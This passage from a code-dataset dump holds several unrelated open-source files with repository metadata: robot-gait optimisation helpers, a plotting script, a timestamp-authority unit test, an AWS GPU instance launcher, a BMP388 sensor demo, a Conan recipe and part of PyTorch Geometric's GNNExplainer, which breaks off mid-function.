for link in robot.links[2:]: # everything else
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].setub(radians(+90))
link['q'][fe, cp, 'theta'].setlb(radians(-90))
# never fallen over
for fe, cp in robot.indices(one_based=True):
body['q'][fe, cp, 'z'].setlb(0.3)
body['q'][fe, cp, 'z'].setub(0.7)
if at_angle_d is None:
# roughly bound to y plane
for fe, cp in robot.indices(one_based=True, skipfirst=False):
body['q'][fe, cp, 'y'].setub(0.2)
body['q'][fe, cp, 'y'].setlb(-0.2)
# average velocity init (overwrite the init!)
for fe, cp in robot.indices(one_based=True, skipfirst=False):
body['q'][fe, cp, 'x'].value = avg_vel * \
total_time * (fe-1 + (cp-1)/ncp)/(nfe-1)
body['dq'][fe, cp, 'x'].value = avg_vel
body['q'][nfe, ncp, 'x'].fix(total_time*avg_vel)
# periodic
periodic(robot, but_not=('x',))
else:
θᵣ = radians(at_angle_d)
# average velocity init (overwrite the init!)
for fe, cp in robot.indices(one_based=True, skipfirst=False):
scale = total_time * (fe-1 + (cp-1)/ncp)/(nfe-1)
body['q'][fe, cp, 'x'].value = avg_vel * scale * cos(θᵣ)
body['dq'][fe, cp, 'x'].value = avg_vel * cos(θᵣ)
body['q'][fe, cp, 'y'].value = avg_vel * scale * sin(θᵣ)
body['dq'][fe, cp, 'y'].value = avg_vel * sin(θᵣ)
#ol.visual.warn('Should probably also bound x, y!')
body['q'][nfe, ncp, 'x'].fix(total_time * avg_vel * cos(θᵣ))
body['q'][nfe, ncp, 'y'].fix(total_time * avg_vel * sin(θᵣ))
# periodic
periodic(robot, but_not=('x', 'y'))
return add_costs(robot, include_transport_cost=False, include_torque_cost=False)
# def set_quad_motor_limits(robot: System3D):
# """
# >>> robot.make_pyomo_model(nfe=10, collocation='implicit_euler', total_time=0.3)
# >>> increase_motor_limits(robot, torque_bound=5., no_load_speed=100.)
# >>> ol.motor.torques(robot)[0]['Tc'].pprint()
# """
# assert robot.m is not None, \
# 'robot.make_pyomo_model() must be called before calling this function'
# motors = {motor.name: motor for motor in ol.motor.torques(robot)}
# def set_lims(name, torque_bound, no_load_speed):
# motor = motors[name]
# for Tc in motor['Tc'][:, :]:
# Tc.setub(+torque_bound)
# Tc.setlb(-torque_bound)
# if hasattr(motor, 'torque_speed_limit'):
# tsp = motor.torque_speed_limit
# tsp.torque_bounds = (-torque_bound, torque_bound)
# tsp.no_load_speed = no_load_speed
# for name in ("base_B_base_F_torque", "base_B_UBL_torque", "base_B_UBR_torque"):
# set_lims(name, 2.5, 75.)
# for name in ("base_F_UFL_torque", "base_F_UFR_torque"):
# set_lims(name, 2., 150.)
# # for name in ("base_B_tail0_torque", "tail0_tail1_torque"):
# # set_lims(name, TORQUE, SPEED)
# for name in ("UFL_LFL_torque", "UFR_LFR_torque"):
# set_lims(name, 1., 75.)
# for name in ("UBL_LBL_torque", "UBR_LBR_torque"):
# set_lims(name, 0.75, 50.)
def theoretical_peak_power(*,
mass: float,
pct_mass_for_actuation: float = 0.5,
watts_per_kg: float = 600.,
disp: bool = True):
"""
>>> theoretical_peak_power(mass=sum(link.mass for link in robot.links))
"""
peak_power = mass*pct_mass_for_actuation*watts_per_kg
if disp:
print(f'Expected total power of a {mass:.2f} kg cheetah with '
f'{100*pct_mass_for_actuation:.2f}% of mass for actuation '
f'and {watts_per_kg:.2f} W/kg: mass*actuation*watts_per_kg = '
f'{int(peak_power)} W')
return peak_power
def theoretical_peak_angle_velocity(stride_freq_Hz: float = 3.,
total_angle_deg: float = 180.,
disp: bool = True):
"""Cheetah leg moves from 0⁰ -> 90⁰ -> 0⁰ in about 1/3 of a second. Ie, follows the shape:
position(t) = 90/2 * sin(radians(t/0.3 * 360))
where t = 0..0.3
Differentiating with respect to time:
velocity(t) = 90/2 * cos(radians(t/0.3 * 360)) * 360/0.3
Giving a max velocity of
velocity(0) -> 90/2 * 360/0.3 =
Example code:
```python
from math import pi as π
total_angle_deg = 180.
stride_freq_Hz = 3.
t = np.linspace(0, 1/stride_freq_Hz)
pos = lambda t: total_angle_deg/2 * np.sin(t*stride_freq_Hz * 2*π)
plt.plot(t, 10*pos(t), label='position [deg] scaled by 10')
vel = lambda t: total_angle_deg/2 * np.cos(t*stride_freq_Hz * 2*π) * stride_freq_Hz * 2*π
plt.plot(t, vel(t), label='velocity [deg]')
max_ω_deg = total_angle_deg/2 * stride_freq_Hz * 2*π
plt.title(f'total angle change = {total_angle_deg} deg\nmax angular velocity = {max_ω_deg:.1f} deg/s = {np.radians(max_ω_deg):.1f} rad/s')
plt.legend(); plt.show()
```
"""
from math import pi as π, radians
peak = total_angle_deg/2 * stride_freq_Hz * 2*π
if disp:
print(f'Expected peak angular velocity of a leg moving though '
f'{total_angle_deg} degrees at {stride_freq_Hz} Hz:\n'
f'total_angle_deg/2 * stride_freq_Hz * 2*π '
f'= {peak:.2f} deg/s = {radians(peak):.2f} rad/s')
return peak
# def plot_power_values(robot: System3D, power_arr: List[np.ndarray]):
# import matplotlib.pyplot as plt
# peaks = np.sum(
# np.hstack(power_arr),
# axis=1
# )
# total_time = sum(
# robot.m.hm[fe].value for fe in robot.m.fe if fe != 1)*robot.m.hm0.value
# nfe = len(robot.m.fe)
# plt.plot(np.linspace(0, total_time, num=nfe), peaks)
# plt.title(
# f'Total power output of cheetah.\nPeak power: {int(np.max(peaks))} W')
# plt.ylabel('Total power [W]')
# plt.xlabel('time [s]')
# plt.show()
def relative_tail_velocity(cheetah: System3D, plot: bool) -> Dict[Tuple[str, str, str], ndarray]:
import matplotlib.pyplot as plt
from numpy import degrees, array # type: ignore
import numpy as np
base_B = cheetah['base_B']
tail0 = cheetah['tail0']
tail1 = cheetah['tail1']
diffs = {}
for a, b in ((base_B, tail0), (tail0, tail1)):
for ang in ('psi', 'theta'):
vela = array([a['q'][fe, cp, ang].value
for fe, cp in cheetah.indices(one_based=True)])
velb = array([b['q'][fe, cp, ang].value
for fe, cp in cheetah.indices(one_based=True)])
# diff = velb[:,0,idx] - vela[:,0,idx]
diff: np.ndarray = vela - velb
diffs[(a.name, b.name, ang)] = diff
if plot is True:
plt.plot(degrees(vela))
plt.plot(degrees(velb))
plt.plot(degrees(diff))
plt.legend((a.name, b.name, 'diff'))
plt.title(f'{a.name} - {b.name}: {ang}, in degrees/sec')
plt.show()
return diffs
def gather_torque_data(cheetah: System3D, datanames: Iterable[str]) -> Dict[str, List[ndarray]]:
import dill
import pathlib
import numpy as np
from physical_education.motor import torques
data = None
for dataname in datanames:
cheetah.init_from_dict(dill.loads(
pathlib.Path(dataname).read_bytes()),
skip_if_fixed=True, skip_if_not_None=False, fix=False
)
datapoint: Dict[str, np.ndarray] = {
motor.name: motor.save_data_to_dict()['Tc']
for motor in torques(cheetah)
}
if data is None:
data = {k: [] for k in datapoint.keys()}
for k, v in datapoint.items():
data[k].append(v)
assert data is not None
return data
````
avg_line_length: 40.337563 | max_line_length: 146 | alphanum_fraction: 0.541622
qsc_code_*_quality_signal (zero-valued entries omitted): num_words=4,478, num_chars=31,786, mean_word_length=3.709022, frac_words_unique=0.149174, frac_chars_top_2grams=0.013005, frac_chars_top_3grams=0.009633, frac_chars_top_4grams=0.016858, frac_chars_dupe_5grams=0.377928, frac_chars_dupe_6grams=0.312722, frac_chars_dupe_7grams=0.264315, frac_chars_dupe_8grams=0.229454, frac_chars_dupe_9grams=0.185321, frac_chars_dupe_10grams=0.163827, frac_chars_digital=0.04039, frac_chars_whitespace=0.305984, size_file_byte=31,786, num_lines=787, num_chars_line_max=147, num_chars_line_mean=40.388818, frac_chars_alphabet=0.712511, frac_chars_comments=0.209904, frac_lines_dupe_lines=0.201699, frac_lines_long_string=0.002123, frac_chars_string_length=0.150993, frac_chars_long_word_length=0.007998, frac_lines_prompt_comments=0.001271, frac_lines_assert=0.004246
qsc_codepython_*_quality_signal: cate_ast=1, frac_lines_func_ratio=0.027601, cate_var_zero=false, frac_lines_pass=0, frac_lines_import=0.063694, frac_lines_simplefunc=0.008493, score_lines_no_logic=0.11465, frac_lines_print=0.004246
unsuffixed duplicate qsc_* columns: all 0 (frac_words_unique and frac_lines_string_concat are null) | effective: 1 | hits: 0
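In `periodic_gallop_test` above, foot names are derived by slicing off the `_foot` suffix; the tempting `str.rstrip('_foot')` idiom is a classic pitfall because `rstrip` strips a character set, not a suffix. A standalone demonstration in plain Python:

```python
# rstrip removes any trailing characters drawn from {'_', 'f', 'o', 't'},
# which only coincidentally looks like suffix removal.
assert "LFL_foot".rstrip("_foot") == "LFL"      # happens to work
assert "left_foot".rstrip("_foot") == "le"      # also eats the 'ft' of "left"
assert "left_foot"[:-len("_foot")] == "left"    # slicing removes exactly the suffix
```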
hexsha: af1dd273f6773d5545946eaa77b49cdb5d3fee31 | size: 982 | ext: py | lang: Python
max_stars: count 3, events 2019-05-07T13:48:45.000Z → 2020-09-02T15:10:35.000Z; path data_visualization/data_visualization.py, repo or-tal-robotics/mcl_pi, head 02d9b3bdd68c54afde36da320e1ce4bdc8d057d8, licenses ["Apache-2.0"]
max_issues: count null, events null → null; same path/head/licenses, repo or-tal-robotics/MCL_PI
max_forks: count 2, events 2021-01-28T23:34:21.000Z → 2021-06-29T05:33:35.000Z; same path/head/licenses, repo or-tal-robotics/MCL_PI
content:
```python
#!/usr/bin/env python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
def main():
data_komodo = pd.read_csv('komodo.csv',sep=',')
data_armadillo = pd.read_csv('armadillo.csv',sep=',')
data_visualization(data_komodo)
data_visualization(data_armadillo)
def data_visualization(data):
x = data['1']
ref = np.asarray(data['0'])
err = data['2']
x_temp = []
ref_temp = []
err_temp = []
for ii in range(len(ref)):
# np.float was removed in NumPy 1.24; parse as plain float, in text mode (sep=' ')
x_temp.append(np.fromstring(x[ii][1:-1], dtype=float, count=3, sep=' '))
ref_temp.append(np.fromstring(ref[ii][1:-1], dtype=float, count=2, sep=' '))
err_temp.append(np.fromstring(err[ii], dtype=float, sep=' '))
x = np.array(x_temp)
ref = np.array(ref_temp)
err = np.array(err_temp)
plt.plot(x[:,0],x[:,1])
plt.plot(ref[:,0],ref[:,1])
plt.show()
plt.plot(err)
plt.show()
if __name__ == "__main__":
main()
```
avg_line_length: 25.179487 | max_line_length: 88 | alphanum_fraction: 0.588595
qsc_code_*_quality_signal (zero-valued entries omitted): num_words=148, num_chars=982, mean_word_length=3.72973, frac_words_unique=0.310811, frac_chars_top_2grams=0.092391, frac_chars_top_3grams=0.11413, frac_chars_top_4grams=0.119565, frac_chars_dupe_5grams=0.076087, frac_chars_dupe_6grams=0.076087, frac_chars_dupe_7grams=0.076087, frac_chars_digital=0.017219, frac_chars_whitespace=0.231161, size_file_byte=982, num_lines=39, num_chars_line_max=89, num_chars_line_mean=25.179487, frac_chars_alphabet=0.713907, frac_chars_comments=0.020367, frac_lines_dupe_lines=0.068966, frac_chars_string_length=0.040583
qsc_codepython_*_quality_signal: cate_ast=1, frac_lines_func_ratio=0.068966, cate_var_zero=false, frac_lines_pass=0, frac_lines_import=0.103448, frac_lines_simplefunc=0, score_lines_no_logic=0.172414, frac_lines_print=0
unsuffixed duplicate qsc_* columns: all 0 (frac_words_unique and frac_lines_string_concat are null) | effective: 1 | hits: 0
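`data_visualization.py` parses strings such as `"[1.0 2.0 3.0]"` with `np.fromstring`, whose text mode is deprecated, and the original used `np.float`, which was removed in NumPy 1.24. A self-contained modern equivalent (`parse_vector` is an invented helper name):

```python
# Modern replacement for np.fromstring(text, dtype=np.float, sep=' ').
import numpy as np

def parse_vector(s: str) -> np.ndarray:
    # "[1.0 2.0 3.0]" -> array([1., 2., 3.])
    return np.array(s.strip().strip("[]").split(), dtype=float)

print(parse_vector("[1.0 2.0 3.0]"))  # [1. 2. 3.]
```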
hexsha: af1ff2337c60e542c9bcc64ce74be8ee36948153 | size: 1,822 | ext: py | lang: Python
max_stars: count 6, events 2021-02-04T13:15:13.000Z → 2022-02-04T17:21:40.000Z; path pyasice/tests/test_tsa.py, repo vgaicuks/pyasice, head 4e955a4aedc319199dfd367d1d092ba99f4fe1c2, licenses ["0BSD"]
max_issues: count 5, events 2020-10-26T14:43:34.000Z → 2021-12-27T14:40:10.000Z; same path/repo/head/licenses as max_stars
max_forks: count 1, events 2021-07-21T15:36:31.000Z → 2021-07-21T15:36:31.000Z; path pyasice/tests/test_tsa.py, repo thorgate/pyasice, head 4423b7251392c7bf6bc5d14800b9b396b8eb2222, licenses ["0BSD"]
content:
```python
import hashlib
from unittest.mock import Mock, patch
from asn1crypto.cms import ContentInfo
from asn1crypto.tsp import PKIStatus, PKIStatusInfo, TimeStampResp
from pyasice.tsa import requests, TSA
class MockResponse(Mock):
status_code = 200
headers = {"Content-Type": TSA.RESPONSE_CONTENT_TYPE}
def test_tsa_build_message_imprint():
assert TSA.build_message_imprint(b"test") == {
"hash_algorithm": {"algorithm": "sha256"},
"hashed_message": hashlib.sha256(b"test").digest(),
}
def test_tsa_get_timestamp(demo_ts_response):
tsa = TSA("http://dummy.url")
with patch.object(tsa, "build_ts_request") as mock_build_ts_request:
mock_build_ts_request.return_value = Mock()
mock_build_ts_request.return_value.dump.return_value = "Mock TSA Request"
with patch.object(requests, "post") as mock_post:
mock_post.return_value = response = MockResponse()
response.content = TimeStampResp(
{
"status": PKIStatusInfo(
{
"status": PKIStatus(0),
}
),
"time_stamp_token": ContentInfo.load(demo_ts_response),
}
).dump()
ts_response = tsa.get_timestamp(b"test")
assert isinstance(ts_response, ContentInfo)
mock_build_ts_request.assert_called_once_with(b"test")
mock_post.assert_called_once_with(
"http://dummy.url",
data="Mock TSA Request",
headers={
"Content-Type": TSA.REQUEST_CONTENT_TYPE,
"Connection": "close",
},
)
def test_tsa_existing_response(demo_xml_signature, demo_ts_response):
TSA.verify(demo_ts_response, demo_xml_signature.get_timestamped_message())
```
avg_line_length: 31.964912 | max_line_length: 81 | alphanum_fraction: 0.63337
qsc_code_*_quality_signal (zero-valued entries omitted): num_words=204, num_chars=1,822, mean_word_length=5.338235, frac_words_unique=0.333333, frac_chars_top_2grams=0.055096, frac_chars_top_3grams=0.064279, frac_chars_top_4grams=0.066116, frac_chars_dupe_5grams=0.05326, frac_chars_dupe_6grams=0.05326, frac_chars_digital=0.008989, frac_chars_whitespace=0.267289, size_file_byte=1,822, num_lines=56, num_chars_line_max=82, num_chars_line_mean=32.535714, frac_chars_alphabet=0.806742, frac_chars_string_length=0.115258, frac_lines_assert=0.093023
qsc_codepython_*_quality_signal: cate_ast=1, frac_lines_func_ratio=0.069767, cate_var_zero=false, frac_lines_pass=0, frac_lines_import=0.116279, frac_lines_simplefunc=0, score_lines_no_logic=0.255814, frac_lines_print=0.046512
unsuffixed duplicate qsc_* columns: all 0 (frac_words_unique and frac_lines_string_concat are null) | effective: 1 | hits: 0
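`test_tsa.py` nests `patch.object` contexts to cut both the request builder and the HTTP call out of the loop. The same wiring in a compact, standard-library-only form (the `Client`/`send` names are invented for illustration):

```python
# Patch an instance attribute and a module-level function, then assert
# on how the patched pieces were called.
from unittest.mock import patch

class Client:
    def build_request(self):
        return "real request"

    def call(self):
        return send(self.build_request())

def send(request):  # stands in for requests.post
    raise RuntimeError("no network in tests")

client = Client()
with patch.object(client, "build_request", return_value="fake request"):
    with patch(f"{__name__}.send") as mock_send:
        mock_send.return_value = "ok"
        assert client.call() == "ok"
        mock_send.assert_called_once_with("fake request")
```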
hexsha: af2278683fee1298b0caf86e836a20709cd9fe8a | size: 1,619 | ext: py | lang: Python
max_stars: count 3, events 2019-03-05T00:46:56.000Z → 2021-11-26T10:20:40.000Z; path deploy/gpu/aws/launch_aws.py, repo ysglh/DeepVideoAnalytics, head ce807cc1595c813250bb4bc7dfc6fb76cd644335, licenses ["MIT", "Apache-2.0", "BSD-3-Clause"]
max_issues: count null, events null → null; path deploy/gpu/aws/launch_aws.py, repo jiangxu87/DeepVideoAnalytics, head e401b3273782409b2604657514bec293d6aa75b0, licenses ["MIT", "Apache-2.0", "BSD-3-Clause"]
max_forks: count 4, events 2021-09-22T07:47:27.000Z → 2022-01-23T14:16:08.000Z; same path/repo/head/licenses as max_issues
content:
```python
#!/usr/bin/env python
import logging, boto3, subprocess
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M',
filename='../../logs/cloud.log',
filemode='a')
from config import AMI,KeyName,SecurityGroupName,IAM_ROLE,env_user,key_filename
if __name__ == '__main__':
ec2 = boto3.client('ec2')
ec2r = boto3.resource('ec2')
instances = ec2r.create_instances(DryRun=False, ImageId=AMI, KeyName=KeyName, MinCount=1, MaxCount=1,
SecurityGroups=[SecurityGroupName, ], InstanceType="p2.xlarge",
Monitoring={'Enabled': True, },BlockDeviceMappings=[{"DeviceName": "/dev/sda1",
"Ebs" : { "VolumeSize" : 200 }}],
IamInstanceProfile=IAM_ROLE)
for instance in instances:
instance.wait_until_running()
instance.reload()
print(instance.id, instance.instance_type)
logging.info("instance allocated")
with open('host','w') as h:
h.write(instance.public_ip_address)
fh = open("connect.sh", 'w')
fh.write(
"#!/bin/bash\n" + 'autossh -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -L 8600:localhost:8000 -L 8688:localhost:8888 -i ' + key_filename + " " + env_user + "@" +
instance.public_ip_address + "\n")
fh.close()
subprocess.call(['fab','deploy'])
```
avg_line_length: 52.225806 | max_line_length: 189 | alphanum_fraction: 0.546016
qsc_code_*_quality_signal (zero-valued entries omitted): num_words=163, num_chars=1,619, mean_word_length=5.288344, frac_words_unique=0.674847, frac_chars_top_2grams=0.025522, frac_chars_top_3grams=0.037123, frac_chars_top_4grams=0.053364, frac_chars_digital=0.034234, frac_chars_whitespace=0.314392, size_file_byte=1,619, num_lines=31, num_chars_line_max=190, num_chars_line_mean=52.225806, frac_chars_alphabet=0.742342, frac_chars_comments=0.012353, frac_lines_long_string=0.035714, frac_chars_string_length=0.201376
qsc_codepython_*_quality_signal: cate_ast=1, frac_lines_func_ratio=0, cate_var_zero=false, frac_lines_pass=0, frac_lines_import=0.071429, frac_lines_simplefunc=0, score_lines_no_logic=0.071429, frac_lines_print=0.035714
unsuffixed duplicate qsc_* columns: all 0 (frac_words_unique and frac_lines_string_concat are null) | effective: 1 | hits: 0
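`launch_aws.py` assembles `connect.sh` from many concatenated strings; an f-string version is easier to audit. A sketch reusing the names from the file (`write_connect_script` itself is invented):

```python
# Equivalent connect.sh generation with an f-string (same tunnel flags).
def write_connect_script(host: str, user: str, key: str,
                         path: str = "connect.sh") -> None:
    script = (
        "#!/bin/bash\n"
        'autossh -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" '
        f"-L 8600:localhost:8000 -L 8688:localhost:8888 -i {key} {user}@{host}\n"
    )
    with open(path, "w") as fh:
        fh.write(script)

# e.g. write_connect_script(instance.public_ip_address, env_user, key_filename)
```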
hexsha: af235ba38a9be96557da2c0dd0d6fdf8cdff77b7 | size: 604 | ext: py | lang: Python
max_stars: count 2, events 2021-06-18T09:34:05.000Z → 2021-06-18T09:52:18.000Z; path Arduino/DFRobot_BMP388-master/DFRobot_BMP388-master/raspbarry/example/I2CReadTemperature/I2CReadTemperature.py, repo giglioq/Ocean-Buoy, head c30151b7af974733260f57d1d3eefe0a1d63be90, licenses ["MIT"]
max_issues: count null, events null → null; same path/repo/head/licenses as max_stars
max_forks: count null, events null → null; same path/repo/head/licenses as max_stars
content:
```python
# Connect bmp388 and a Raspberry Pi via I2C.
#
# Warning:
# This demo only supports python3.
# Run this demo : python3 I2CReadTemperature.py
#
# connect:
# raspberry bmp388
# 3.3v(1) VCC
# GND(6) GND
# SCL(5) SCL
# SDA(3) SDA
# BMP388_I2C_ADDR = 0x76: pin SDO is low
# BMP388_I2C_ADDR = 0x77: pin SDO is high
import bmp388
import time
# Create a bmp388 object to communicate with I2C.
bmp388 = bmp388.DFRobot_BMP388_I2C(0x77)
# Read temperature and print it
while 1:
temp = bmp388.readTemperature()
print("Temperature : %s C" %temp)
time.sleep(0.5)
```
avg_line_length: 22.37037 | max_line_length: 49 | alphanum_fraction: 0.652318
qsc_code_*_quality_signal (zero-valued entries omitted): num_words=87, num_chars=604, mean_word_length=4.45977, frac_words_unique=0.609195, frac_chars_top_2grams=0.069588, frac_chars_top_3grams=0.06701, frac_chars_digital=0.128889, frac_chars_whitespace=0.254967, size_file_byte=604, num_lines=27, num_chars_line_max=50, num_chars_line_mean=22.37037, frac_chars_alphabet=0.733333, frac_chars_comments=0.668874, frac_chars_string_length=0.097826, frac_chars_hex_words=0.021739
qsc_codepython_*_quality_signal: cate_ast=1, frac_lines_func_ratio=0, cate_var_zero=false, frac_lines_pass=0, frac_lines_import=0.285714, frac_lines_simplefunc=0, score_lines_no_logic=0.285714, frac_lines_print=0.142857
unsuffixed duplicate qsc_* columns: all 0 (frac_words_unique and frac_lines_string_concat are null) | effective: 1 | hits: 0
hexsha: af25fd66be9e5c7407f8446bd876b6900df66a06 | size: 2,037 | ext: py | lang: Python
max_stars: count 4, events 2019-06-08T23:54:02.000Z → 2020-11-10T20:57:54.000Z; path conanfile_installer.py, repo madebr/conan-vulkan_lunarg, head d805ad7c8628587033140dd8bf458c798f355165, licenses ["MIT"]
max_issues: count 1, events 2019-08-16T13:27:59.000Z → 2019-08-16T13:27:59.000Z; path conanfile_installer.py, repo madebr/conan-lunarg_vulkan_sdk, head d805ad7c8628587033140dd8bf458c798f355165, licenses ["MIT"]
max_forks: count 2, events 2019-07-30T20:52:50.000Z → 2020-06-26T11:00:52.000Z; same path/repo/head/licenses as max_issues
content:
```python
# -*- coding: utf-8 -*-
import os
from conanfile_base import ConanFileBase
class ConanFileInstaller(ConanFileBase):
name = "vulkan_lunarg_installer"
exports = ConanFileBase.exports + ["conanfile_base.py"]
settings = "os_build", "arch_build"
_is_installer = True
def package(self):
if self.settings.os_build == "Windows":
base_folder = os.path.join(self.build_folder, self._source_subfolder)
if self.settings.arch_build == "x86":
bin_folder = os.path.join(base_folder, "Bin32")
tools_folder = os.path.join(base_folder, "Tools32")
elif self.settings.arch_build == "x86_64":
bin_folder = os.path.join(base_folder, "Bin")
tools_folder = os.path.join(base_folder, "Tools")
self.copy(pattern="*.exe", dst="bin", src=bin_folder)
self.copy(pattern="*", dst="bin/tools", src=tools_folder)
self.copy(pattern="LICENSE.txt", dst="licenses", src=base_folder)
elif self.settings.os_build == "Linux":
base_folder = os.path.join(self.build_folder, self._source_subfolder)
bin_folder = os.path.join(base_folder, str(self.settings.arch_build), "bin")
self.copy(pattern="*", dst="bin", src=bin_folder)
self.copy(pattern="LICENSE.txt", dst="licenses", src=base_folder)
elif self.settings.os_build == "Macos":
base_folder = os.path.join(self.build_folder, self._source_subfolder, "macOS")
self.copy(pattern="*", dst="bin", src=os.path.join(base_folder, "bin"))
def package_info(self):
self.cpp_info.bindirs = ["bin"]
if self.settings.os_build == "Windows":
self.cpp_info.bindirs.append("bin/tools")
for bindir in self.cpp_info.bindirs:
bindir_fullpath = os.path.join(self.package_folder, bindir)
self.output.info("Appending PATH environment variable: {}".format(bindir_fullpath))
self.env_info.PATH.append(bindir_fullpath)
```
avg_line_length: 46.295455 | max_line_length: 95 | alphanum_fraction: 0.63623
qsc_code_*_quality_signal (zero-valued entries omitted): num_words=257, num_chars=2,037, mean_word_length=4.836576, frac_words_unique=0.249027, frac_chars_top_2grams=0.088496, frac_chars_top_3grams=0.080451, frac_chars_top_4grams=0.102977, frac_chars_dupe_5grams=0.552695, frac_chars_dupe_6grams=0.509252, frac_chars_dupe_7grams=0.411907, frac_chars_dupe_8grams=0.292035, frac_chars_dupe_9grams=0.255833, frac_chars_dupe_10grams=0.255833, frac_chars_digital=0.006984, frac_chars_whitespace=0.226804, size_file_byte=2,037, num_lines=43, num_chars_line_max=96, num_chars_line_mean=47.372093, frac_chars_alphabet=0.782222, frac_chars_comments=0.010309, frac_lines_dupe_lines=0.171429, frac_chars_string_length=0.117676, frac_chars_long_word_length=0.01142
qsc_codepython_*_quality_signal: cate_ast=1, frac_lines_func_ratio=0.057143, cate_var_zero=false, frac_lines_pass=0, frac_lines_import=0.057143, frac_lines_simplefunc=0, score_lines_no_logic=0.257143, frac_lines_print=0
unsuffixed duplicate qsc_* columns: all 0 (frac_words_unique and frac_lines_string_concat are null) | effective: 1 | hits: 0
hexsha: af26f7f77af7f12e0aa08bff53add63e6fd4a8b4 | size: 10,384 | ext: py | lang: Python
max_stars: count 2,350, events 2021-09-12T08:32:50.000Z → 2022-03-31T18:09:36.000Z; path torch_geometric/nn/models/gnn_explainer.py, repo NucciTheBoss/pytorch_geometric, head e220a2c08fa1b2f1672d616c22eac2a67b5c8967, licenses ["MIT"]
max_issues: count 588, events 2021-09-12T08:49:08.000Z → 2022-03-31T21:02:13.000Z; same path/repo/head/licenses as max_stars
max_forks: count 505, events 2021-09-13T13:13:32.000Z → 2022-03-31T15:54:00.000Z; same path/repo/head/licenses as max_stars
content:
```python
from math import sqrt
from typing import Optional
import torch
from tqdm import tqdm
from torch_geometric.nn.models.explainer import (
Explainer,
clear_masks,
set_masks,
)
EPS = 1e-15
class GNNExplainer(Explainer):
r"""The GNN-Explainer model from the `"GNNExplainer: Generating
Explanations for Graph Neural Networks"
<https://arxiv.org/abs/1903.03894>`_ paper for identifying compact subgraph
structures and small subsets of node features that play a crucial role in a
GNN’s node-predictions.
.. note::
For an example of using GNN-Explainer, see `examples/gnn_explainer.py
<https://github.com/pyg-team/pytorch_geometric/blob/master/examples/
gnn_explainer.py>`_.
Args:
model (torch.nn.Module): The GNN module to explain.
epochs (int, optional): The number of epochs to train.
(default: :obj:`100`)
lr (float, optional): The learning rate to apply.
(default: :obj:`0.01`)
num_hops (int, optional): The number of hops the :obj:`model` is
aggregating information from.
If set to :obj:`None`, will automatically try to detect this
information based on the number of
:class:`~torch_geometric.nn.conv.message_passing.MessagePassing`
layers inside :obj:`model`. (default: :obj:`None`)
return_type (str, optional): Denotes the type of output from
:obj:`model`. Valid inputs are :obj:`"log_prob"` (the model
returns the logarithm of probabilities), :obj:`"prob"` (the
model returns probabilities), :obj:`"raw"` (the model returns raw
scores) and :obj:`"regression"` (the model returns scalars).
(default: :obj:`"log_prob"`)
feat_mask_type (str, optional): Denotes the type of feature mask
that will be learned. Valid inputs are :obj:`"feature"` (a single
feature-level mask for all nodes), :obj:`"individual_feature"`
(individual feature-level masks for each node), and :obj:`"scalar"`
(scalar mask for each node). (default: :obj:`"feature"`)
allow_edge_mask (boolean, optional): If set to :obj:`False`, the edge
mask will not be optimized. (default: :obj:`True`)
log (bool, optional): If set to :obj:`False`, will not log any learning
progress. (default: :obj:`True`)
**kwargs (optional): Additional hyper-parameters to override default
settings in :attr:`~torch_geometric.nn.models.GNNExplainer.coeffs`.
"""
coeffs = {
'edge_size': 0.005,
'edge_reduction': 'sum',
'node_feat_size': 1.0,
'node_feat_reduction': 'mean',
'edge_ent': 1.0,
'node_feat_ent': 0.1,
}
def __init__(self, model, epochs: int = 100, lr: float = 0.01,
num_hops: Optional[int] = None, return_type: str = 'log_prob',
feat_mask_type: str = 'feature', allow_edge_mask: bool = True,
log: bool = True, **kwargs):
super().__init__(model, lr, epochs, num_hops, return_type, log)
assert feat_mask_type in ['feature', 'individual_feature', 'scalar']
self.allow_edge_mask = allow_edge_mask
self.feat_mask_type = feat_mask_type
self.coeffs.update(kwargs)
def _initialize_masks(self, x, edge_index, init="normal"):
(N, F), E = x.size(), edge_index.size(1)
std = 0.1
if self.feat_mask_type == 'individual_feature':
self.node_feat_mask = torch.nn.Parameter(torch.randn(N, F) * std)
elif self.feat_mask_type == 'scalar':
self.node_feat_mask = torch.nn.Parameter(torch.randn(N, 1) * std)
else:
self.node_feat_mask = torch.nn.Parameter(torch.randn(1, F) * std)
std = torch.nn.init.calculate_gain('relu') * sqrt(2.0 / (2 * N))
if self.allow_edge_mask:
self.edge_mask = torch.nn.Parameter(torch.randn(E) * std)
def _clear_masks(self):
clear_masks(self.model)
self.node_feat_masks = None
self.edge_mask = None
def _loss(self, log_logits, prediction, node_idx: Optional[int] = None):
if self.return_type == 'regression':
if node_idx is not None and node_idx >= 0:
loss = torch.cdist(log_logits[node_idx], prediction[node_idx])
else:
loss = torch.cdist(log_logits, prediction)
else:
if node_idx is not None and node_idx >= 0:
loss = -log_logits[node_idx, prediction[node_idx]]
else:
loss = -log_logits[0, prediction[0]]
if self.allow_edge_mask:
m = self.edge_mask.sigmoid()
edge_reduce = getattr(torch, self.coeffs['edge_reduction'])
loss = loss + self.coeffs['edge_size'] * edge_reduce(m)
ent = -m * torch.log(m + EPS) - (1 - m) * torch.log(1 - m + EPS)
loss = loss + self.coeffs['edge_ent'] * ent.mean()
m = self.node_feat_mask.sigmoid()
node_feat_reduce = getattr(torch, self.coeffs['node_feat_reduction'])
loss = loss + self.coeffs['node_feat_size'] * node_feat_reduce(m)
ent = -m * torch.log(m + EPS) - (1 - m) * torch.log(1 - m + EPS)
loss = loss + self.coeffs['node_feat_ent'] * ent.mean()
return loss
def explain_graph(self, x, edge_index, **kwargs):
r"""Learns and returns a node feature mask and an edge mask that play a
crucial role to explain the prediction made by the GNN for a graph.
Args:
x (Tensor): The node feature matrix.
edge_index (LongTensor): The edge indices.
**kwargs (optional): Additional arguments passed to the GNN module.
:rtype: (:class:`Tensor`, :class:`Tensor`)
"""
self.model.eval()
self._clear_masks()
# all nodes belong to same graph
batch = torch.zeros(x.shape[0], dtype=int, device=x.device)
# Get the initial prediction.
prediction = self.get_initial_prediction(x, edge_index, batch=batch,
**kwargs)
self._initialize_masks(x, edge_index)
self.to(x.device)
if self.allow_edge_mask:
set_masks(self.model, self.edge_mask, edge_index,
apply_sigmoid=True)
